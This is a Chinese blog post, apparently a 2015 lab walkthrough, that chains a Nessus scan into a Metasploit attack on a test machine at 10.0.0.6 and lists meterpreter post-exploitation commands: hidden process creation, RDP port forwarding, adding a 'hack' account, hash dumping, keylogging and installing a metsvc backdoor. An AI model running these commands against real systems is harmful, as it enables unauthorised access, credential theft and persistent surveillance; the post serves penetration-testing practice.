• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
Blood_Zero
从新开始!从心开始!
   首页    新随笔       管理     

Nessus+Metasploit

1、环境

受害者IP:10.0.0.6

2、攻击

首先使用Nessus进行扫描

 

扫描结果

 

我们将结果导出来,然后导入msfconsole中

 

使用vulns进行漏洞分析

 

 

查找对应的漏洞

 

使用漏洞进行攻击

 

这时候我们就获得了一个meterpreter

3、控制后门

测试是否是虚拟机:

 

迁移进程,防止当前进程被删除

 

 

 

ps:查看进程

migrate pid:迁移进程

execute –H –i –f cmd.exe:创建新进程,-H不可见,-i交互

getpid:获取进程号

getuid:查看权限

sysinfo:系统信息

端口转发

       portfwd add –l 5678 –p 3389 –r 10.0.0.6:将受害者的3389转发到本机5678

       run getgui –u hack –p hack:添加账户

       rdesktop –u hack –p hack 10.0.0.6:3389:如果转发了就连接本地

 

获取hash

 

键盘监听

keyscan_start:启动监听

keyscan_stop:停止

keyscan_dump:查看

  

后门一:metsvc

 

然后使用

 

我这里失败了,原因是tcp/ip状态为FIN_WAIT_2(跟网络环境有关,如果哪位大牛知道如何解决,请告诉我!)

posted @ 2015-04-28 16:07  BloodZero  阅读(1457)  评论(0)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3